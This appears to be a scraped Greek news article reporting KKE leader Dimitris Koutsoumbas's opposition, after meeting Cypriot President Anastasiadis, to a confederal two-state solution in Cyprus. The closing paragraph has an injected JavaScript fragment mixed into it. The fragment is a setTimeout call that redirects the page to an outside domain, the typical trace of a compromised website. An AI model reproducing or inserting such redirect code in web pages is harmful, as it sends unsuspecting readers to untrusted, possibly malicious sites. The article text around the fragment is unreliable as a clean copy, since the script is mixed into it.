Αντίθετος σε διχοτομική συνομοσπονδιακή λύση στο Κυπριακό ο Δ. Κουτσούμπας

0
3

 

Μετά τη συνάντησή του με τον Πρόεδρο της Κυπριακής Δημοκρατίας, Νίκο Αναστασιάδη ο γγ της ΚΕ του ΚΚΕ, Δημήτρης Κουτσούμπας δήλωσε πως: «Εκφράσαμε τη μεγάλη ανησυχία μας και την αντίθεσή μας ταυτόχρονα σε μια διχοτομική συνομοσπονδιακή λύση στο Κυπριακό ζήτημα που δεν θα ενώνει, αντίθετα θα χωρίζει τον Κυπριακό λαό» και συμπλήρωσε:

«Ταυτόχρονα εκφράσαμε τις πάγιες θέσεις του ΚΚΕ για δίκαιη και βιώσιμη λύση στο Κυπριακό πρόβλημα, για ένα ενιαίο κράτος, που σημαίνει ένα κράτος και όχι δύο κράτη, κοινή πατρίδα Ελληνοκυπρίων, Τουρκοκυπρίων, Μαρωνιτών, Αρμενίων και Λατίνων, χωρίς ξένες στρατιωτικές βάσεις είτε βρετανικές ή άλλες, χωρίς εγγυητές και προστάτες με μια κυριαρχία, μια ιθαγένεια, μια διεθνή προσωπικότητα, αυτό σημαίνει, άλλωστε και ένα κράτος».

Οπως επεσήμανε ο κ. Κουτσούμπας «από αυτήν την σκοπιά εκφράσαμε την αλληλεγγύη μας στον Κυπριακό λαό, στον δίκαιο αλλά δύσκολο αγώνα που δίνει αυτή την περίοδο, έτσι ώστε τελικά να γίνει νοικοκύρης πραγματικά στον τόπο του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here